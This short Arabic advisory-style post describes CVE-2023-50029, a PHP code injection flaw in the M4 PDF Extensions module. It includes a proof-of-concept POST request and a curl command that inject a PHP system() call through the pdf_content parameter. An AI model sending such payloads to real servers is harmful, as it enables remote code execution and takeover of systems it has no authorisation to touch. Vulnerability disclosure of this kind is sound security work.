
CVE-2023-50029: ثغرة حقن PHP في وحدة إضافات PDF من M4
CVE-2023-50029 هي ثغرة حقن PHP في وحدة M4 PDF Extensions. تسمح هذه الثغرة للمهاجمين بحقن وتنفيذ كود PHP عشوائي على الخادم، مما يمكنهم من السيطرة الكاملة على النظام المستهدف. تكمن المشكلة في التحقق غير السليم من المدخلات، مما يسمح بتمرير كود ضار عبر معاملات المستخدم.
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
pdf_content=<?php system('uname -a'); ?>
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"